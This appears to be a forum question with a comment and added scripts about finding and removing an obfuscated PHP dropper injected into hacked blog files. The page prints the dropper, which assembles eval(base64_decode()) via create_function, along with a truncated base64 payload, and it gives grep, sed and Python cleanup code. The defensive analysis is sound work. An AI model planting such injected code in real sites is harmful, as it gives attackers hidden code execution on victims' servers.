find and replace variable data via ssh and grep

I got my server hacked with multiple blogs on it, and am trying to find a string and replace it. This hack is a bit more complex than other ones I've encountered because it's variable. Some data is, however, static. Here is what I do to find the infected files:

find . | xargs grep -lr "ZXZhbChiYXNlNjRfZGVj" *

which is searching for files that have this injected:

<?php
$AcVbHvpF09zNSRuMPElLr = array('6169','6186','6165','6176');   // spells "eval" once 6068 is subtracted from each entry
$SxaHy7s95ObQQJc6f36EGOm = array('1841','1856','1843','1839','1858','1843','1837','1844','1859','1852','1841','1858','1847','1853','1852');   // "create_function" (offset 1742)
$u2vCEM8399Ax6Tw2y = array('9732','9731','9749','9735','9688','9686','9729','9734','9735','9733','9745','9734','9735');   // "base64_decode" (offset 9634)
$YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL = "";   // the base64 payload; empty in this copy
if (!function_exists("OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p")) {
    // Decoder: rebuilds a string by subtracting a fixed offset from each number and taking chr() of the result
    function OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq, $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML) {
        $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz = '';
        foreach ($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq as $xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4) {
            $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz .= chr($xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4 - $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML);
        }
        return $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz;
    }
    $AQnCMAhdS9buT = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($AcVbHvpF09zNSRuMPElLr, 6068);                         // "eval"
    $Eg0IMt83iZbOJYNZ = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($SxaHy7s95ObQQJc6f36EGOm, 1742);                   // "create_function"
    $yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($u2vCEM8399Ax6Tw2y, 9634);   // "base64_decode"
    // Equivalent to create_function('$k', 'eval(base64_decode($k));')
    $FbaILfyEjiFc3kFDDXNL = $Eg0IMt83iZbOJYNZ('$kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ', $AQnCMAhdS9buT.'('.$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt.'($kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ));');
    // Runs the decoded payload
    $FbaILfyEjiFc3kFDDXNL($YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL);
}
?>

However, the arrays are randomly generated, as you can see in this partial copy of the code:

<?phppNSU= array('7868','7885','7864','7875');$ARi0VuBPLRN7WHIEO71nzE7UGX9k= array('2235','2250','2237','2233','2252','2237','2231','2238','2253','2246','2235','2252','2241','2247','2246');$uWbB41mot20bGXYdwsStk5TO2DlQDwlninPce1r= array('4815','4814','4832','4818','4771','4769','4812','4817','4818','4816','4828','4817','4818');$rCeok2zh4L1E8X6GuemL4rp7ve3LRhyxJCMT="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelp

So it is always within the first <?php tag, so I am wondering whether it is possible to search for the infected files using "ZXZhbChiYXNlNjRfZGVj" as a constant, then remove the first instance of <?php and ?>, since the malicious code is always between them. Not sure if this is even possible, though.

Ideas?
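As an added example (not part of the question or of any answer on this page), the following Python script recovers what the numeric arrays in the dropper spell out and what the constant base64 marker stands for. The sample it parses is a constructed copy of the question's dropper: the numbers, offsets and call structure are taken from it verbatim, the random variable names are shortened to $a, $b, $c, $p and f for readability, and the payload string is set to the marker from the question rather than the full blob. The regexes and function names are mine.

```python
import base64
import re

# Constructed stand-in for the sample in the question: numeric arrays, offsets and
# call structure are copied from it; only the meaningless random names are shortened.
SAMPLE = (
    "<?php $a= array('6169','6186','6165','6176');"
    "$b= array('1841','1856','1843','1839','1858','1843','1837','1844','1859',"
    "'1852','1841','1858','1847','1853','1852');"
    "$c= array('9732','9731','9749','9735','9688','9686','9729','9734','9735',"
    "'9733','9745','9734','9735');"
    '$p="ZXZhbChiYXNlNjRfZGVj";'
    'if (!function_exists("f")){ function f($n,$o){$s=\'\';'
    "foreach($n as $x){$s .= chr($x - $o);}return $s;}"
    "$e = f($a,6068);$g = f($b,1742);$h = f($c,9634);"
    "$r = $g('$k',$e.'('.$h.'($k));');$r($p);}?>"
)

ARRAY_RE = re.compile(r"\$(\w+)\s*=\s*array\(([^)]*)\)")          # $name = array('..','..')
CALL_RE = re.compile(r"\(\$(\w+)\s*,\s*(\d+)\)")                  # decoder($name, <offset>)
PAYLOAD_RE = re.compile(r'\$\w+\s*=\s*"([A-Za-z0-9+/=]{16,})"')   # $name = "<base64 blob>"


def decode_array(numbers, offset):
    """Replicate the dropper's decoder: chr(n - offset) for every number in the array."""
    return "".join(chr(int(n) - offset) for n in numbers)


def recover_strings(php):
    """Map each obfuscated array to the string it spells, using the offset passed to the decoder."""
    arrays = {name: re.findall(r"\d+", body) for name, body in ARRAY_RE.findall(php)}
    decoded = {}
    for name, offset in CALL_RE.findall(php):
        if name in arrays:
            decoded[name] = decode_array(arrays[name], int(offset))
    return decoded


def decode_payload_prefix(b64):
    """Decode as much of a (possibly truncated) base64 blob as is complete, i.e. a multiple of 4 chars."""
    usable = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(usable).decode("latin-1")


def summarize(php):
    """Return the function names the dropper assembles and the start of its decoded payload."""
    names = recover_strings(php)
    match = PAYLOAD_RE.search(php)
    payload = decode_payload_prefix(match.group(1)) if match else ""
    return {"functions": sorted(names.values()), "payload_starts_with": payload}


if __name__ == "__main__":
    print(summarize(SAMPLE))
```

On the sample the three arrays decode to eval, create_function and base64_decode, so the dropper builds create_function('$k', 'eval(base64_decode($k));') and calls it on the blob. The marker itself, "ZXZhbChiYXNlNjRfZGVj", is the base64 encoding of "eval(base64_dec", which is why it stays fixed across variants while every array and variable name is randomised: it is the start of the second-stage payload, not part of the decoder.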

1 comment

  1. Save this file as filter.sed:

    :t
    /<?php/,/?>/ {                    # For each line between these block markers..
       /?>/!{                         #   If we are not at the end marker
          $!{                         #     nor the last line of the file,
             N;                       #     add the Next line to the pattern space
             bt                       #     and branch (loop back) to the :t label.
          }
       }                              # Reaching here means the pattern space holds the end marker.
       /ZXZhbChiYXNlNjRfZGVj/d;       # If /regex/ matches, delete the block.
    }                                 # Otherwise, the block will be printed.
    

    Then, from the directory in which your PHP files live:

    sed -i -f filter.sed *.php

    Tip of the hat to this excellent resource.
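An added alternative to the sed filter (my own script, not the commenter's): it only cuts the first <?php ... ?> block when that block contains the marker, keeps whatever follows the closing ?> on the same line (so a site file whose own <?php was pushed onto the dropper's line is not damaged), refuses to touch a file where the marker sits outside the first block or the block has no closing ?>, recurses through subdirectories, and does a dry run unless --apply is given. The status names, the .bak backup convention and the EXAMPLE input are my assumptions and constructed data, not from the page.

```python
import os
import sys

MARKER = b"ZXZhbChiYXNlNjRfZGVj"   # base64 of "eval(base64_dec"; stable across the variants seen

# Constructed example of an infected file: dropper prepended on the same line as the site's own <?php
EXAMPLE = b'<?php $a= array(\'6169\'); $p="ZXZhbChiYXNlNjRfZGVj"; $r($p);?><?php\n// plugin code\n'


def strip_injection(data, marker=MARKER):
    """Remove the first <?php ... ?> block if, and only if, it contains the marker.

    Returns (new_data, status) with status one of:
      'clean'     marker not present anywhere in the file
      'removed'   first block contained the marker and was cut out
      'unclosed'  no <?php, or no ?> after it; left untouched for manual review
      'elsewhere' marker present but not inside the first block; left untouched
    """
    if marker not in data:
        return data, "clean"
    start = data.find(b"<?php")
    end = data.find(b"?>", start + 5) if start != -1 else -1
    if start == -1 or end == -1:
        return data, "unclosed"
    end += 2                                   # include the closing ?>
    if marker not in data[start:end]:
        return data, "elsewhere"
    rest = data[end:]
    # The dropper is prepended to the original file; drop the newline it left behind,
    # but keep anything else on that line (for example the site's own "<?php").
    if start == 0 and rest.startswith(b"\n"):
        rest = rest[1:]
    return data[:start] + rest, "removed"


def clean_tree(root, exts=(".php",), dry_run=True, marker=MARKER):
    """Walk root, classify every matching file, and rewrite infected ones unless dry_run."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            new_data, status = strip_injection(data, marker)
            report[path] = status
            if status == "removed" and not dry_run:
                with open(path + ".bak", "wb") as fh:   # keep the infected copy for forensics
                    fh.write(data)
                with open(path, "wb") as fh:
                    fh.write(new_data)
    return report


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(strip_injection(EXAMPLE))        # show the behaviour on the constructed example
    else:
        apply = "--apply" in sys.argv
        for path, status in sorted(clean_tree(sys.argv[1], dry_run=not apply).items()):
            if status != "clean":
                print(f"{status:9} {path}")
```

Run it first without --apply and read the 'elsewhere' and 'unclosed' entries by hand; those are the files where a blind "delete the first <?php ... ?> block" would either miss the payload or cut legitimate code. Cleaning files does not close the hole the attacker used, so keep the .bak copies and timestamps for the investigation of how the code got there.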